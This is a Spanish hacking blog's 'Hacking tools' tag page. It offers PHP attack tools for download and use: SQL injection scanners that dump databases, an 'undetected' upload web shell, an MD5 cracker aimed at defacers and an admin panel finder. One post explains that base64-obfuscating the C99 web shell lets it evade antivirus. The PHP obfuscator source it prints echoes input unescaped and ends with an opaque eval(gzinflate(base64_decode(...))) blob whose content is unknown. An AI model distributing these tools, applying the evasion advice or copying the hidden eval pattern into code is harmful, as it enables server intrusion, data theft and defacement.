Mostrando entradas con la etiqueta Hacking tools. Mostrar todas las entradas
Mostrando entradas con la etiqueta Hacking tools. Mostrar todas las entradas

martes, 18 de diciembre de 2012

Simple PHP Obfuscator

Publicado por OverNet en martes, diciembre 18, 2012 ,

PHPc0de: Obfuscation

Una herramienta simple para obfuscar o encriptar cualquier código en PHP; HTML/TXT. La finalidad de obfuscar es evitar que otras personas puedan ver el código fuente original directamente desde el archivo, para hacerlo tendrán que desencriptar el código obfuscado. 
* También se puede descodificar
Los desarrolladores web suelen proteger su código fuente o más bien dicho su propiedad intelectual obfuscando el código y así evitar que cualquier neófito pueda modificar el código a su gusto.

Code Source PHP



 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<!-- Coded By OverNET -->
<title>PHPc0de => Obfuscation!</title>
<center>
<h1>Obfuscar codigo PHP &amp; HTML/TXT</h1>
<? $file = $_POST['obfuscar'];
$gestor = stripslashes($file);
// Función (base64_encode(gzdeflate());
$texto = base64_encode(gzdeflate($gestor));?>

<form method="POST"><p>
<textarea name="obfuscar" cols="50" rows="10" id="xd"><? 
if($file) {
$_POST['obfuscar'];
echo $gestor;
}else{
 print 'Escriba texto o codigo';
}
?>
</textarea>
  </p>
  <p>
    <input type="submit" name="obfuscarme" value="                             Obfuscar!                           " />
  </p><b>
  <p>Texto ofuscado:</p>
  <p>
  <label for="textarea"></label>
    <textarea cols="50" rows="5" readonly="readonly" id="obfuscar"><?php if($file) {$_POST['obfuscar'];echo "<? eval(gzinflate(base64_decode('".$texto."'))); ?>";}else{
 echo 'Haga clic en el boton -Obfuscar!- para codificar!';}
?></textarea>
  </p>
</form>
<? 
## Prueba de codificación (Copyright) x3
eval(gzinflate(base64_decode('DcnNDkMwAADgx8HN/yqLg5gtaDdSHHZZrK3GT5hiok+/fdePfetB5bIdm6FemfquF+baL8rIRJmq4MOA8n6NBRAIgzWB0VjhaFqKrpRt6SUFcTJMq9xzTwjMzgF5n1JaWMKKTY/vj/bg2Yz3LSS9mdYOEnyKIQEztZ7y/4IcOxQd3orQti7oo4eSmnhkekWb0oD5LQh8X9E07fwD'))); ?>
</center>
<!-- Coded By OverNET -->

domingo, 13 de noviembre de 2011

SQL Injection Tool (Online && PHP code)

3 comentarios, Publicado por OverNet en domingo, noviembre 13, 2011 ,
Sql InyeXion Scanner F-Security Team

SQLi Tool Online

Información sobre el Autor:
F-Security - Sql InyeXion Scanner v1
Desarrollado por Knet
Adminitradores - www.remoteexecution.org
Contacto:
Keynet.security@Gmail.com [ Mail ]
Keynet.security@Hotmail.com [ Msn ]
Caracteristicas:
  • Vuln Number Found
  • Column Brute Force
  • Table Brute Force
  • Load_file()
  • Show Info Server
Download File | https://sites.google.com/site/rootnetworking/SQLI.tar
Demo Online | http://goo.gl/2WXgb

sábado, 12 de noviembre de 2011

SQLi Tool By ECEK2 & OON_BOY [PHP]

0 comentarios, Publicado por OverNet en sábado, noviembre 12, 2011 ,
SQL INJECTION TOOL BY ECEK2 & OON_BOY


SQLi Tool en PHP (Caracteristicas):
  • Find Column & Info.
  • Show DataBase.
  • Find Tables.
  • Find Columns.
  • Dump DataBase.

Demostración Online | http://goo.gl/Np1P1
Descargar archivo PHP | https://sites.google.com/site/rootnetworking/SQLiTool.php

sábado, 15 de octubre de 2011

Simple Upload Shell by Neutralise - PHP

3 comentarios, Publicado por OverNet en sábado, octubre 15, 2011 ,
Simple Upload Shell coded by Shang1 & Neutralise

Un sencillo upload de archivos.

Simple Upload Shell By Neutralise && Shang1

Características de la Shell:
  • Upload de archivos
  • Directory File View
  • Type: PHP/XHTML
  • Undetected
  • Size: 4.00 Kb
Download File | https://sites.google.com/site/rootnetworking/simple_upload.php

miércoles, 27 de julio de 2011

Ofuscar una PHPShell (Indetectar Codigo fuente)

1 comentarios, Publicado por OverNet en miércoles, julio 27, 2011 ,
¿Como hacer indetectable una PHP Shell?  
(FUD a los Antivirus)

PHP-SHELL Imagen logo
Para los que no saben que es una PHP Shell (En definición a "Defacement").
PHP Shell o Shell PHP es un programa o script desarrollado íntegramente en PHP. Su principal función es la posibilidad de ejecutar los famosos shell-commands en el servidor donde se encuentre.
Algunos tienen bastas funciones, como la de explorar los directorios en el servidor en que se encuentre, crear archivos y eliminar, crear directorios y eliminar, editar archivos en texto plano, establecer una conexión MySQL, PostgreSQL u Oracle, establecer una conexión con NetCat, cambiar permisos a los elementos del servidor, etc.
(Fuente | Wikipedia)

Teniendo en cuenta que ya cualquier PHPShell es detectada por los antivirus, sin embargo, los servidores escanean este tipo de Scripts en sus sitios web, y muy difícil que el atacante pueda ejecutar la PHP Shell.
La Shell C99 es detectada por todos los antivirus, sin embargo, existe la base64 c99 que es la misma versión unicamente ofuscada en Base 64 y es FUD (Indetectable).

domingo, 24 de julio de 2011

String a Hexadecimal [PHP Code]

0 comentarios, Publicado por OverNet en domingo, julio 24, 2011 ,
String to Hex Tool
Convierte una cadena a hexadecimal.

Str - Hex (String - Hexadecimal)
Codigo PHP
<?
// Función PHP
$string = $_POST['pagina'];
function string2hexa($str)
{
    $hex='';
    for ($i=0; $i < strlen($str); $i++)
    {
        $hex .= dechex(ord($str[$i]));
    }
    return $hex;
}
?>
<!-- Formulario HTML -->
<form name="form1" method="post" action="">
    <label for="pagina"></label>
    <input name="pagina" type="text" id="pagina" value="<?php echo $string;?>">
  <p>
    <input type="submit">
  </p>
</form>
<?
### RootNetworking ###
echo '0x'.string2hexa($string);
?>

Fuente | Asnippet

viernes, 8 de julio de 2011

Port Scanner [PHP]

0 comentarios, Publicado por OverNet en viernes, julio 08, 2011 ,
Port Scanner en PHP
Como el nombre del titulo lo dice, es un Escáner de puertos (Comprueba si un puerto esta abierto o cerrado).
Escáner de puertos (Online PHP)
Una pequeña herramienta programada en PHP, sin embargo, se desconoce el nombre del autor.
Lo he probado en localhost y funciona a la perfección.

miércoles, 29 de junio de 2011

Online Mult MD5 Hash Cracker [PHP]

7 comentarios, Publicado por OverNet en miércoles, junio 29, 2011 ,
MD5 Hash Cracker (Online)

¿Que es MD5 Hash?
Es un algoritmo de reducción criptográfico de 128 bits ampliamente usado.
(Segun Wikipedia)

MD5 Hash Logo (md5() function)

Muchos de los problemas que tienen los defacers, es que al encontrarse con una cadena enciptada en MD5 Hash (Contraseña), es muy casí imposible que el atacante pueda desifrarla sin herramientas o alguna clase de herramienta de fuerza bruta.

domingo, 26 de junio de 2011

Admin Panel Finder - By Neutralised [PHP]

6 comentarios, Publicado por OverNet en domingo, junio 26, 2011 ,
SC Admin Panel Finder - Coded by Neutralised [PHP]
Les dejo el Código Fuente de un "Admin Panel Finder" programado por Neutralised. Cabé mencionar que esta hecho en PHP, y su objetivo de esta sencilla herramienta es encontrar el directorio o archivo en la que se encuentre un sistema de logueo.

Les dejo una imagen de como funciona esta herramienta:

Admin Panel Finder by Neutralise